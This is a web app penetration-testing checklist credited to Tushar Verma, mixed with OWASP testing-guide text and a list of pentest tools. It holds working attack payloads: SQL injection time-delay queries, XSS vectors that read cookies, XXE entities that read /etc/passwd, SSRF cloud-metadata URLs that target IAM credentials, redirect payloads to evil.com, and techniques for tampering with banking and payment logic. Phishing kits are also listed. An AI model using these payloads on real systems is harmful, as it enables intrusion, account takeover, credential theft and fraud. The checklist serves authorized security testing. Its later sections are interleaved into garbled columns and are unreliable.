- **Recon Phase**

- [ ] Identify web server, technologies

and database

- [ ] Subsidiary and Acquisition

Enumeration

- [ ] Reverse Lookup

- [ ] ASN & IP Space Enumeration and

Service Enumeration

- [ ] Google Dorking

- [ ] Github Recon

- [ ] Directory Enumeration

- [ ] IP Range Enumeration

- [ ] JS Files Analysis

- [ ] Subdomain Enumeration and

Bruteforcing

- [ ] Subdomain Takeover

- [ ] Parameter Fuzzing

- [ ] Port Scanning

- [ ] Template-Based Scanning(Nuclei)

- [ ] Wayback History

- [ ] Broken Link Hijacking

- [ ] Internet Search Engine Discovery

- [ ] Misconfigured Cloud Storage

- **Registration Feature Testing**

- [ ] Check for duplicate registration/

Overwrite existing user

- [ ] Check for weak password policy

- [ ] Check for reuse existing usernames

- [ ] Check for insufficient email

verification process

- [ ] Weak registration implementation-

Allows disposable email addresses

- [ ] Weak registration implementation-

Over HTTP

- [ ] Overwrite default web application

pages by specially crafted username
registrations. => After registration, does
your profile link appears something as [
www.tushar.com/](http://www.chintan.
com/chintan)tushar?

a. If so, enumerate default folders of

web application such as /images, /
contact, /portfolio

b. Do a registration using the username

such as images, contact, portfolio

c. Check if those default folders have

been overwritten by your profile link or
not."

- **Session Management Testing**

- [ ] Identify actual session cookie out

of bulk cookies in the application

- [ ] Decode cookies using some

standard decoding algorithms such as
Base64, hex, URL, etc

- [ ] Modify cookie.session token value

by 1 bit/byte. Then resubmit and do the
same for all tokens. Reduce the amount of
work you need to perform in order to
identify which part of the token is actually
being used and which is not

- [ ] If self-registration is available and

you can choose your username, log in with
a series of similar usernames containing
small variations between them, such as A,
AA, AAA, AAAA, AAAB, AAAC, AABA, and
so on. If another user-specific data is
submitted at login or stored in user
profiles (such as an email address)

- [ ] Check for session cookies and

cookie expiration date/time

- [ ] Identify cookie domain scope

- [ ] Check for HttpOnly flag in cookie

- [ ] Check for Secure flag in cookie if

the application is over SSL

- [ ] Check for session fixation i.e. value

of session cookie before and after
authentication

- [ ] Replay the session cookie from a

different effective IP address or system to
check whether the server maintains the
state of the machine or not

- [ ] Check for concurrent login through

different machine/IP

- [ ] Check if any user pertaining

information is stored in cookie value or not
If yes, tamper it with other user's data

- [ ] Failure to Invalidate Session on (

Email Change,2FA Activation)

- **Authentication Testing**

- [ ] Username enumeration

- [ ] Bypass authentication using

various SQL Injections on username and
password field

- Lack of password confirmation on

- [ ] Change email address

- [ ] Change password

- [ ] Manage 2FA

- [ ] Is it possible to use resources

without authentication? Access violation

- [ ] Check if user credentials are

transmitted over SSL or not

- [ ] Weak login function HTTP and

HTTPS both are available

- Test user account lockout mechanism

on brute force attack

Variation : If server blocks instant

user requests, then try with time throttle
option from intruder and repeat the
process again.

- [ ] Bypass rate limiting by

tampering user agent to Mobile User agent

- [ ] Bypass rate limiting by

tampering user agent to Anonymous user
agent

- [ ] Bypass rate liniting by using null

byte

- [ ] Create a password wordlist using

cewl command

- Test Oauth login functionality

- OAuth Roles

- [ ] Resource Owner → User

- [ ] Resource Server → Twitter

- [ ] Client Application → [
Twitterdeck.com](http://twitterdeck.com/)

- [ ] Authorization Server → Twitter

- [ ] client_id → Twitterdeck ID (
This is a public, non-secret unique
identifier_

- [ ] client_secret → Secret Token

known to the Twitter and Twitterdeck to
generate access_tokens

- [ ] response_type → Defines the

token type e.g (code, token, etc.)

- [ ] scope → The requested level

of access Twitterdeck wants

- [ ] redirect_uri → The URL user is

redirected to after the authorization is
complete

- [ ] state → Main CSRF protection

in OAuth can persist data between the user
being directed to the authorization server
and back again

- [ ] grant_type → Defines the

grant_type and the returned token type

- [ ] code → The authorization

code twitter generated, will be like ?
code= , the code is used with client_id and
client_secret to fetch an access_token

- [ ] access_token → The token

twitterdeck uses to make API requests on
behalf of the user

- [ ] refresh_token → Allows an
application to obtain a new access_token
without prompting the user

- Code Flaws

- [ ] Re-Using the code

- [ ] Code Predict/Bruteforce and

Rate-limit

- [ ] Is the code for application X

valid for application Y?

- Redirect_uri Flaws

- [ ] URL isn't validated at all: ?

redirect_uri=https://attacker.com

- [ ] Subdomains allowed (
Subdomain Takeover or Open redirect on
those subdomains): ?redirect_uri=https://
sub.twitterdeck.com

- [ ] Host is validated, path isn't

Chain open redirect): ?redirect_uri=
https://twitterdeck.com/callback?
redirectUrl=https://evil.com

- [ ] Host is validated, path isn't (

Referer leakages): Include external
content on HTML page and leak code via
Referer

- [ ] Weak Regexes

- [ ] Bruteforcing the URL encoded

chars after host: redirect_uri=https://
twitterdeck.com§FUZZ§

- [ ] Bruteforcing the keywords

whitelist after host (or on any whitelist
open redirect filter): ?redirect_uri=https://
§FUZZ§.com

- [ ] URI validation in place: use

typical open redirect payloads

- State Flaws

- [ ] Missing State parameter? (

CSRF)

- [ ] Predictable State parameter?

- [ ] Is State parameter being

verified?

- Misc

- [ ] Is client_secret validated?

- [ ] Pre ATO using facebook

phone-number signup

- [ ] No email validation Pre ATO

- Test 2FA Misconfiguration

- [ ] Response Manipulation

- [ ] Status Code

- [ ] Manipulation

- [ ] 2FA Code Leakage in Response

- [ ] 2FA Code Reusability

- [ ] Lack of Brute-Force Protection

- [ ] Missing 2FA Code Integrity

Validation

- [ ] With null or 000000

- **My Account (Post Login) Testing**

- [ ] Find parameter which uses active

account user id. Try to tamper it in order
to change the details of the other accounts

- [ ] Create a list of features that are

pertaining to a user account only. Change
Email Change Password -Change account
details (Name, Number, Address, etc.) Try
CSRF

- [ ] Post login change email id and

update with any existing email id. Check if
its getting validated on server side or not.
Does the application send any new email
confirmation link to a new user or not?
What if a user does not confirm the link in
some time frame?

- [ ] Open profile picture in a new tab

and check the URL. Find email id/user id
info. EXIF Geolocation Data Not Stripped
From Uploaded Images.

- [ ] Check account deletion option if

application provides it and confirm that
via forgot password feature

- [ ] Change email id, account id, user id

parameter and try to brute force other
user's password

- [ ] Check whether application re

authenticates for performing sensitive
operation for post authentication features

- **Forgot Password Testing**

- [ ] Failure to invalidate session on

Logout and Password reset

- [ ] Check if forget password reset link/

code uniqueness

- [ ] Check if reset link does get expire

or not if its not used by the user for certain
amount of time

- [ ] Find user account identification

parameter and tamper Id or parameter
value to change other user's password

- [ ] Check for weak password policy

- [ ] Weak password reset

implementation Token is not invalidated
after use

- [ ] If reset link has another param such

as date and time, then. Change date and
time value in order to make active & valid
reset link

- [ ] Check if security questions are

asked? How many guesses allowed? -->
Lockout policy maintained or not?

- [ ] Add only spaces in new password

and confirmed password. Then Hit enter
and see the result

- [ ] Does it display old password on the

same page after completion of forget
password formality?

- [ ] Ask for two password reset link and

use the older one from user's email

- [ ] Check if active session gets

destroyed upon changing the password or
not?

- [ ] Weak password reset

implementation Password reset token sent
over HTTP

- [ ] Send continuous forget password

requests so that it may send sequential
tokens

- **Contact Us Form Testing**

- [ ] Is CAPTCHA implemented on
contact us form in order to restrict email
flooding attacks?

- [ ] Does it allow to upload file on the

server?

- [ ] Blind XSS

- **Product Purchase Testing**

- Buy Now

- [ ] Tamper product ID to purchase

other high valued product with low prize

- [ ] Tamper product data in order to

increase the number of product with the
same prize

- Gift/Voucher

- [ ] Tamper gift/voucher count in the

request (if any) to increase/decrease the
number of vouchers/gifts to be used

- [ ] Tamper gift/voucher value to

increase/decrease the value of the
voucher in terms of money. (e.g. $100 is
given as a voucher, tamper value to
increase, decrease money)

- [ ] Reuse gift/voucher by using old

gift values in parameter tampering

- [ ] Check the uniqueness of gift/

voucher parameter and try guessing other
gift/voucher code

- [ ] Use parameter pollution

technique to add the same voucher twice
by adding same parameter name and value
again with & in the BurpSuite request

- Add/Delete Product from Cart

- [ ] Tamper user id to delete

products from other user's cart

- [ ] Tamper cart id to add/delete

products from other user's cart

- [ ] Identify cart id/user id for cart

feature to view the added items from other
user's account

- Address

- [ ] Tamper BurpSuite request to

change other user's shipping address to
yours

- [ ] Try stored XSS by adding XSS

vector on shipping address

- [ ] Use parameter pollution

technique to add two shipping address
instead of one trying to manipulate
application to send same item on two
shipping address

- Place Order

- [ ] Tamper payment options

parameter to change the payment method.
E.g. Consider some items cannot be
ordered for cash on delivery but tampering
request parameters from debit/credit/
PayPal/net banking option to cash on
delivery may allow you to

place order for that particular item

- [ ] Tamper the amount value for

payment manipulation in each main and
sub requests and responses

- [ ] Check if CVV is going in

cleartext or not

- [ ] Check if the application itself

processes your card details and then
performs a transaction or it calls any third-
party payment processing company to
perform a transaction

- Track Order

- [ ] Track other user's order by

guessing order tracking number

- [ ] Brute force tracking number

prefix or suffix to track mass orders for
other users

- Wish list page testing

- [ ] Check if a user A can add/

remote products in Wishlist of other user
B’s account

- [ ] Check if a user A can add

products into user B’s cart from his/her (
user A’s) Wishlist section.

- Post product purchase testing

- [ ] Check if user A can cancel orders

for user B’s purchase

- [ ] Check if user A can view/check

orders already placed by user B

- [ ] Check if user A can modify the

shipping address of placed order by user B

- Out of band testing

- [ ] Can user order product which is

out of stock?

- **Banking Application Testing**

- Billing Activity

- [ ] Check if user 'A' can view the

account statement for user 'B'

- [ ] Check if user 'A' can view the

transaction report for user 'B'

- [ ] Check if user 'A' can view the

summary report for user 'B'

- [ ] Check if user 'A' can register for

monthly/weekly account statement via
email behalf of user 'B'

- [ ] Check if user 'A' can update the

existing email id of user 'B' in order to
retrieve monthly/weekly account summary

- Deposit/Loan/Linked/External
Account Checking

- [ ] Check if user 'A' can view the

deposit account summary of user 'B'

- [ ] Check for account balance

tampering for Deposit accounts

- Tax Deduction Inquiry Testing

- [ ] Check if user 'A' with it's

customer id 'a' can see the tax deduction
details of user 'B' by tampering his/her
customer id 'b'

- [ ] Check parameter tampering for

increasing and decreasing interest rate,
interest amount, and tax refund

- [ ] Check if user 'A' can download

the TDS details of user 'B’

- [ ] Check if user 'A' can request for the

cheque book behalf of user ‘B’.

- Fixed Deposit Account Testing

- [ ] Check if is it possible for user 'A'

to open FD account behalf of user 'B'

- [ ] Check if Can user open FD

account with the more amount than the
current account balance

- Stopping Payment on basis of cheque/

date range

- [ ] Can user 'A' stop the payment of

user 'B' via cheque number

- [ ] Can user 'A' stop the payment on

basis of date range for user 'B’

- Status Enquiry Testing

- [ ] Can user 'A' view the status

enquiry of user 'B'

- [ ] Can user 'A' modify the status

enquiry of user 'B'

- [ ] Can user 'A' post and enquiry

behalf of user 'B' from his own account

- Fund transfer testing

- [ ] Is it possible to transfer funds to

user 'C' instead of user 'B' from the user 'A'
which was intended to transfer from user '
A' to user 'B'

- [ ] Can fund transfer amount be

manipulated?

- [ ] Can user 'A' modify the payee

list of user 'B' by parameter manipulation
using his/her own account

- [ ] Is it possible to add payee

without any proper validation in user 'A' 's
own account or to user 'B' 's account

- Schedule transfer testing

- [ ] Can user 'A' view the schedule

transfer of user 'B'

- [ ] Can user 'A' change the details

of schedule transfer for user 'B’

- Testing of fund transfer via NEFT

- [ ] Amount manipulation via NEFT

transfer

- [ ] Check if user 'A' can view the

NEFT transfer details of user 'B’

- Testing for Bill Payment

- [ ] Check if user can register payee

without any checker approval

- [ ] Check if user 'A' can view the

pending payments of user 'B'

- [ ] Check if user 'A' can view the

payment made details of user 'B'

- **Open Redirection Testing**

- Common injection parameters

```markup

/{payload}

?next={payload}

?url={payload}

?target={payload}

?rurl={payload}

?dest={payload}

?destination={payload}

?redir={payload}

?redirect_uri={payload}

?redirect_url={payload}

?redirect={payload}

/redirect/{payload}

/cgi-bin/redirect.cgi?{payload}

/out/{payload}

/out?{payload}

?view={payload}

/login?to={payload}

?image_url={payload}

?go={payload}

?return={payload}

?returnTo={payload}

?return_to={payload}

?checkout_url={payload}

?continue={payload}

?return_path={payload}

```

- [ ] Use burp 'find' option in order to

find parameters such as URL, red, redirect,
redir, origin, redirect_uri, target etc

- [ ] Check the value of these parameter

which may contain a URL

- [ ] Change the URL value to [www.

tushar.com](http://www.chintan.com/)
and check if gets redirected or not

- [ ] Try Single Slash and url encoding

- [ ] Using a whitelisted domain or

keyword

- [ ] Using // to bypass http blacklisted

keyword

- [ ] Using https: to bypass //

blacklisted keyword

- [ ] Using \\ to bypass // blacklisted

keyword

- [ ] Using \/\/ to bypass // blacklisted

keyword

- [ ] Using null byte %00 to bypass

blacklist filter

- [ ] Using ° symbol to bypass

- **Host Header Injection**

- [ ] Supply an arbitrary Host header

- [ ] Check for flawed validation

- Send ambiguous requests

- [ ] Inject duplicate Host headers

- [ ] Supply an absolute URL

- [ ] Add line wrapping

- [ ] Inject host override headers

- **SQL Injection Testing**

- Entry point detection

- [ ] Simple characters

- [ ] Multiple encoding

- [ ] Merging characters

- [ ] Logic Testing

- [ ] Weird characters

- Use SQLmap to identify vulnerabile

parameters

- [ ] Fill form in browser GUI submit it

normally
Web App PenTest Checklist
- [ ] Go to history tab in burpsuite Prepared by: Tushar Verma
and find the relevent request

- [ ] Right click and select the option "

copy to file"

- [ ] Save file as anyname.txt

- [ ] SQLmap command to run

- [ ] python [sqlmap.py](http://
sqlmap.py/) r ~/Desktop/textsqli.txt
proxy= [http://127.0.0.1:8080](http://127.0.
0.1:8080/)

- [ ] Run SQL injection scanner on all

requests

- Bypassing WAF

- [ ] Using Null byte before SQL query

- [ ] Using SQL inline comment

sequence

- [ ] URL encoding

- [ ] Changing Cases (uppercase/

lowercase)

- [ ] Use SQLMAP tamper scripts

- Time Delays

```markup

Oracle dbms_pipe.receive_
message(('a'),10)

Microsoft WAITFOR DELAY '0:0:

10'

PostgreSQL SELECT pg_sleep(10)

MySQL SELECT sleep(10)

```

- Conditional Delays

```markup

Oracle SELECT CASE WHEN (

YOUR-CONDITION-HERE) THEN 'a'||dbms_
pipe.receive_message(('a'),10) ELSE NULL
END FROM dual

Microsoft IF (YOUR-CONDITION-
HERE) WAITFOR DELAY '0:0:10'

PostgreSQL SELECT CASE

WHEN (YOUR-CONDITION-HERE) THEN pg_
sleep(10) ELSE pg_sleep(0) END

MySQL SELECT IF(YOUR-

CONDITION-HERE,sleep(10),'a')

```

- **Cross-Site Scripting Testing**

- [ ] Try XSS using QuickXSS tool by

theinfosecguy

- [ ] Upload file using '"><img src=x

onerror=alert(document.domain)>.txt

- [ ] If script tags are banned, use <h1>

and other HTML tags

- [ ] If output is reflected back inside

the JavaScript as a value of any variable
just use alert(1)

- [ ] if " are filtered then use this

payload /><img src=d onerror=confirm(/
tushar/);>

- [ ] Upload a JavaScript using Image file

- [ ] Unusual way to execute your JS

payload is to change method from POST
to GET. It bypasses filters sometimes

- Tag attribute value

- [ ] Input landed -<input type=”text”

name=”state” value=”INPUT_FROM_ USER”>

- [ ] Payload to be inserted -“
onfocus=”alert(document.cookie)"

- [ ] Syntax Encoding payload “%

3cscript%3ealert(document.cookie)%3c/
script%3e"

- XSS filter evasion

- [ ] < and > can be replace with html

entities &lt; and &gt;

- [ ] You can try an XSS polyglot.Eg:-

javascript:/*-></title></style></
textarea></script></xmp><svg/
onload='+/"/+/onmouseover=1/+/[*/[]/+
alert(1)//'>

- XSS Firewall Bypass

- [ ] Check if the firewall is blocking

only lowercase

- [ ] Try to break firewall regex with

the new line(\r\n)

- [ ] Try Double Encoding

- [ ] Testing for recursive filters

- [ ] Injecting anchor tag without

whitespaces

- [ ] Try to bypass whitespaces using

Bullet

- [ ] Try to change request method

- **CSRF Testing**

- [ ] Validation of CSRF token depends

on request method

- [ ] Validation of CSRF token depends

on token being present

- [ ] CSRF token is not tied to the user

session

- [ ] CSRF token is tied to a non-session

cookie

- [ ] Validation of Referer depends on

header being present

- **SSO Vulnerabilities**

- [ ] If internal.company.com Redirects
You To SSO e.g. auth.company.com, Do
FUZZ

On Internal.company.com

- [ ] If company.com/internal Redirects
You To SSO e.g. Google login, Try To Insert

public Before internal e.g. company.

com/public/internal To Gain Access
Internal

- [ ] Try To Craft SAML Request With

Token And Send It To The Server And
Figure

Out How Server Interact With This

- [ ] If There Is
AssertionConsumerServiceURL In Token
Request Try To Insert Your

Domain e.g. http://me.com As Value To

Steal The Token

- [ ] If There Is
AssertionConsumerServiceURL In Token
Request Try To Do FUZZ
https://github.com/OWASP/wstg/tree/
On Value Of master/document/4-Web_Application_
AssertionConsumerServiceURL If It Is Not Security_Testing
Similar To Origin
Project https://owasp.org/www-project-web-
- [ ] If There Is Any UUID, Try To Change security-testing-guide/latest/
It To UUID Of Victim Attacker e.g. Email Of

Internal Employee Or Admin Account etc https://github.com/OWASP/wstg/tree/

master/document/4-Web_Application_
- [ ] Try To Figure Out If The Server Security_Testing/07-Input_Validation_
Vulnerable To XML Signature Wrapping Testing
OR Not?
Identify variables that are reflected in
- [ ] Try To Figure Out If The Server responses.
Checks The Identity Of The Signer OR Not?
Testing for Reflected Cross Site Scripting Assess the input they accept and the
- [ ] Try To Inject XXE Payloads At The encoding that gets applied on return (if
Top Of The SAML Response any).

- [ ] Try To Inject XSLT Payloads Into Identify stored input that is reflected on
The Transforms Element As A Child the client-side.

Node Of The SAML Response

Testing for Stored Cross Site Scripting Assess the input they accept and the
encoding that gets applied on return (if
- [ ] If Victim Can Accept Tokens Issued
any).
By The Same Identity Provider That
Services
Identify SQL injection points.
Attacker, So You Can Takeover Victim
Testing for SQL Injection Assess the severity of the injection and the
Account
level of access that can be achieved
through it.
- [ ] While Testing SSO Try To search In
Burp Suite About URLs In Cookie Header e.
Identify SSI injection points.
g.
Testing for SSI Injection
Host=IP; If There Is Try To Change IP To Assess the severity of the injection.
Your IP To Get SSRF Input Validation Testing
Identify injection points where you can
- **XML Injection Testing** inject code into the application.
Testing for Code Injection
- [ ] Change the content type to text/ Assess the injection severity.
xml then insert below code. Check via
repeater Detect template injection vulnerability
points.

Testing for Server-side Template Injection Identify the templating engine.

```markup
Build the exploit.
<?xml version="1.0" encoding="ISO 8859
1"?> Identify SSRF injection points.

<!DOCTYPE tushar [ Testing for Server-Side Request Forgery Test if the injection points are exploitable.

<!ELEMENT tushar ANY Asses the severity of the vulnerability.

<!ENTITY xxe SYSTEM "file:///etc/ Identify and assess the command injection
passwd" >]><tushar>&xxe;</ Testing for Command Injection points.

<!ENTITY xxe SYSTEM "file:///etc/ Identify existing error output.

hosts" >]><tushar>&xxe;</ Testing for Improper Error Handling
Analyze the different output returned.
<!ENTITY xxe SYSTEM "file:///proc/self/
cmdline" >]><tushar>&xxe;</

<!ENTITY xxe SYSTEM "file:///proc/ network diagrams and configurations;

version" >]><tushar>&xxe;</
archived posts and emails by
``` administrators or other key staff;

logon procedures and username formats;

Use a search engine to search for
- [ ] Blind XXE with out-of-band potentially sensitive information. This may usernames, passwords, and private keys;
interaction Search Engine Recon include:
third-party, or cloud service configuration
- **Cross-origin resource sharing (CORS)** files;

- [ ] Errors parsing Origin headers revealing error message content; and

- [ ] Whitelisted null origin value

development, test, User Acceptance
Testing (UAT), and staging versions of
- **Server-side request forgery (SSRF)**
sites.
- Common injection parameters
Techniques used for web server
fingerprinting include banner grabbing,
eliciting responses to malformed requests,
and using automated tools to perform
```markup
more robust scans that use a combination
of tactics. The fundamental premise by
"access=",
which all these techniques operate is the
same. They all strive to elicit some
"admin=",
response from the web server which can
then be compared to a database of known
"dbg=",
responses and behaviors, and thus
Fingerprint web matched to a known server type.
"debug=",
Identify hidden or obfuscated paths and
"edit=",
functionality through the analysis of
metadata files.
"grant=",
Web Server Metafile Extract and map other information that
"test=",
could lead to better understanding of the
systems at hand.
"alter=",

Enumerate the applications within scope

"clone=",
that exist on a web server.
Enumerate Applications on Webserver
"create=",

Review webpage comments, metadata,

"delete=",
and redirect bodies to find any information
leakage.
"disable=",

"enable=", Gather JavaScript files and review the JS

Review Webpage Content for Information
code to better understand the application
Leakage
"exec=", and to find any information leakage.

"execute=", Identify if source map files or other front-

end debug files exist.
"load=",
Identify possible entry and injection points
"make=", Identify Application Entry Points through request and response analysis.

"modify=", Map the target application and understand

Map Execution Paths Through Application the principal workflows.
"rename=",
Fingerprint the components being used by
"reset=", Fingerprint Web Application Framework the web applications.

"shell=", Understand the architecture of the

Map Application Architecture application and the technologies in use.
"toggle=",
https://github.com/S3cur3Th1sSh1t/
"adm=", Pentest-Tools

"root=", https://github.com/enaqx/awesome-
pentest
"cfg=",
https://github.com/arch3rPro/
"dest=", PentestTools

"redirect=", Information Gathering

"uri=", Domain Name

"path=", Subdomain

"continue=",
Google Hacking
"url=",
GHDB - Google Hack Database
"window=",
SearchDiggity - SearchDiggity 3.1 is the
"next=", primary attack tool of the Google Hacking
Diggity Project
"data=",
Katana - A Python Tool For google Hacking
"reference=",
uDork - uDork is a script written in Bash
"site=", Scripting that uses advanced Google
search techniques to obtain sensitive
"html=", information in files or directories, find IoT
devices, detect versions of web
"val=", applications, and so on.

"validate=", Pagodo - pagodo (Passive Google Dork) -

Automate Google Hacking Database
"domain=",
Information Gathering
scraping and searching .

"callback=", Github

"return=", GitHacker - 🕷 A Git source leak exploit

tool that restores the entire Git repository,
"page=", including data from stash, for white-box
auditing and analysis of developers' mind.
"feed=",
GitGraber - gitGraber is a tool developed
"host=", in Python3 to monitor GitHub to search
and find sensitive data in real time for
"port=", different online services.

"to=",
GitMiner - Tool for advanced mining for
content on Github.
"out=",

Gitrob - Reconnaissance tool for GitHub

"view=",
organizations.
"dir=",
SVN
"show=",
svnExploit - Support for SVN source code
"navigation=", disclosure of full version and Dump it.

"open=", SvnHack - SvnHack is a SVN folder

disclosure exploit.
"file=",
Port Scan
"document=",
Nmap | Zenmap - Free and open source
"folder=", utility for network discovery and security
auditing
"pg=",
Masscan - TCP port scanner, spews SYN
"php_path=", packets asynchronously

"style=", Ports - Common service ports and

exploitations
"doc=",
Goby - Attack surface mapping
"img=",

Goscan - Interactive Network Scanner

"filename="

``` NimScan - 🚀 Fast Port Scanner 🚀

RustScan - 🤖 The Modern Port Scanner

🤖
- [ ] Try basic localhost payloads
OSINT
- Bypassing filters
theHarvester- E-mails, subdomains and
- [ ] Bypass using HTTPS
WSTG (Web names Harvester - OSINT

- [ ] Bypass with [::]

Application Security SpiderFoot - SpiderFoot automates OSINT
for threat intelligence and mapping your
- [ ] Bypass with a domain redirection
Testing) OWASP - attack surface.

- [ ] Bypass using a decimal IP

location Mind Map FOCA - Tool to find metadata and hidden
information in the documents.

- [ ] Bypass using IPv6/IPv4 Address Amass - In-depth Attack Surface Mapping

Embedding and Asset Discovery

- [ ] Bypass using malformed urls

Censys-subdomain-finder - Perform
subdomain enumeration using the
- [ ] Bypass using rare address(short-
certificate transparency logs from Censys.
hand IP addresses by dropping the zeros)

EmailHarvester - Email addresses harvester

- [ ] Bypass using enclosed
alphanumerics
Finalrecon - The Last Web Recon Tool You'
- Cloud Instances ll Need.

- AWS LittleBrother - Information gathering (

OSINT) on a person (EU)

Phishing
```markup
gophish - Open-Source Phishing Toolkit
http://instance-data
AdvPhishing - This is Advance Phishing
http://169.254.169.254 Tool ! OTP PHISHING

http://169.254.169.254/latest/user- SocialFish - Educational Phishing Tool &

data Information Collector

http://169.254.169.254/latest/user- Zphisher - An automated phishing tool

data/iam/security-credentials/[ROLE with 30+ templates. This Tool is made for
NAME] Tools educational purpose only ! Author will not
be responsible for any misuse of this
http://169.254.169.254/latest/ toolkit !
meta-data/
Nexphisher - Advanced Phishing tool for
http://169.254.169.254/latest/
Linux & Termux
meta-data/iam/security-credentials/[
ROLE NAME]
Vulnerability Analysis
http://169.254.169.254/latest/
meta-data/iam/security-credentials/ Fuzzing
PhotonInstance
Vulnerability Scanner
http://169.254.169.254/latest/
meta-data/ami-id Struts-Scan - Struts2 vulnerability
detection and utilization tools
http://169.254.169.254/latest/
meta-data/reservation-id Nikto - Nikto is an Open Source (GPL) web
server scanner which performs
http://169.254.169.254/latest/ comprehensive tests against web servers
meta-data/hostname for multiple items

http://169.254.169.254/latest/ W3af - Web application attack and audit

meta-data/public-keys/ framework, the open source web
vulnerability scanner
http://169.254.169.254/latest/
meta-data/public-keys/0/openssh-key Openvas - The world's most advanced
Open Source vulnerability scanner and
http://169.254.169.254/latest/ manager
meta-data/public-keys/[ID]/openssh-key
Openvas Docker
http://169.254.169.254/latest/
meta-data/iam/security-credentials/
Archery - Open Source Vulnerability
dummy
Assessment and Management helps
developers and pentesters to perform
http://169.254.169.254/latest/
scans and manage vulnerabilities
meta-data/iam/security-credentials/
s3access
Taipan - Web application vulnerability
scanner
http://169.254.169.254/latest/
dynamic/instance-identity/document
Arachni - Web Application Security
``` Scanner Framework

Web Applications

- Google Cloud CMS & Framwork Identification

AngelSword - CMS vulnerability detection

framework
```markup
WhatWeb - Next generation web scanner
http://169.254.169.254/
computeMetadata/v1/ Wappalyzer - Cross-platform utility that
uncovers the technologies used on
http://metadata.google.internal/ websites
computeMetadata/v1/
Whatruns - A free browser extension that
http://metadata/ helps you identify technologies used on
computeMetadata/v1/ any website at the click of a button (Just
for chrome)
http://metadata.google.internal/
computeMetadata/v1/instance/hostname
WhatCMS - CMS Detection and Exploit Kit
based on Whatcms.org API
http://metadata.google.internal/
computeMetadata/v1/instance/id
CMSeeK - CMS Detection and Exploitation
suite - Scan WordPress, Joomla, Drupal
http://metadata.google.internal/
and over 180 other CMSs
computeMetadata/v1/project/project-id

``` Online Tools

Yunsee - Online website for to find the

CMS footprint
- Digital Ocean
Bugscaner - A simple online fingerprint
identification system that supports
hundreds of cms source code recognition
```markup
WhatCMS online - CMS Detection and
curl http://169.254.169.254/ Exploit Kit website Whatcms.org
metadata/v1/id
Tscan - A online tool to get the
http://169.254.169.254/metadata/ informathion of website
v1.json
TideFinger - Fingerprinter Tool from
http://169.254.169.254/metadata/ TideSec Team
v1/
Web Applications Proxies
http://169.254.169.254/metadata/
v1/id
Burpsuite - Burpsuite is a graphical tool for
testing Web application security
http://169.254.169.254/metadata/
v1/user-data
ZAP One of the world’s most popular free
security tools
http://169.254.169.254/metadata/
v1/hostname
Mitmproxy - An interactive TLS-capable
http://169.254.169.254/metadata/ intercepting HTTP proxy for penetration
v1/region testers and software developers.

http://169.254.169.254/metadata/ Broxy - An HTTP/HTTPS intercept proxy

v1/interfaces/public/0/ipv6/address written in Go.

``` Web Crawlers & Directory Brute Force

Dirbrute - Multi-thread WEB directory

blasting tool (with dics inside)
- Azure
Dirbuster - DirBuster is a multi threaded
java application designed to brute force
directories and files names on web/
``` application servers

http://169.254.169.254/metadata/ Docker Scanners

v1/maintenance
Fuxi-Scanner - open source network
http://169.254.169.254/metadata/ security vulnerability scanner, it comes
instance?api-version=2017-04-02 with multiple functions.

http://169.254.169.254/metadata/
Xunfeng - The patrol is a rapid emergency
instance/network/interface/0/ipv4/
response and cruise scanning system for
ipAddress/0/publicIpAddress?api-version=
enterprise intranets
2017-04-02&format=text

WebMap - Nmap Web Dashboard and

```
Reporting

- [ ] Bypassing via open redirection Review the applications' configurations set

across the network and validate that they
- **File Upload Testing** are not vulnerable.

- [ ] upload the malicious file to the Validate that used frameworks and
archive upload functionality and observe Test Network Infrastructure Configuration systems are secure and not susceptible to
how the application responds known vulnerabilities due to unmaintained
software or default settings and
- [ ] upload a file and change its path to credentials.
overwrite an existing system file
Ensure that defaults and known files have
- [ ] Large File Denial of Service been removed.

- [ ] Metadata Leakage Validate that no debugging code or

extensions are left in the production
- [ ] ImageMagick Library Attacks Test Application Platform Configuration
environments.

- [ ] Pixel Flood Attack Review the logging mechanisms set in

place for the application.
- Bypasses
Dirbust sensitive file extensions, or
- [ ] Null Byte (%00) Bypass extensions that might contain raw data (e.
g. scripts, raw data, credentials, etc.).
- [ ] Content-Type Bypass Test File Extensions Handling for Sensitive
Information
Validate that no system framework
- [ ] Magic Byte Bypass
bypasses exist on the rules set.
- [ ] Client-Side Validation Bypass
Review Old Backup and Unreferenced Files Find and analyse unreferenced files that
for Sensitive Information might contain sensitive information.
- [ ] Blacklisted Extension Bypass
Enumerate Infrastructure and Application Identify hidden administrator interfaces
- [ ] Homographic Character Bypass
Admin Interfaces and functionality.
- **CAPTCHA Testing**
Enumerate supported HTTP methods.
- [ ] Missing Captcha Field Integrity
Test for access control bypass.
Checks
Test HTTP Methods
- [ ] HTTP Verb Manipulation Test XST vulnerabilities.

- [ ] Content Type Conversion Test HTTP method overriding techniques.

- [ ] Reusuable Captcha Test HTTP Strict Transport Security Review the HSTS header and its validity.

- [ ] Check if captcha is retrievable with Test RIA Cross Domain Policy Review and validate the policy files.
the absolute path such as
Review and identify any rogue file
[www.tushar.com/internal/captcha/ Test File Permission permissions.
images/24.png](http://www.chintan.com/
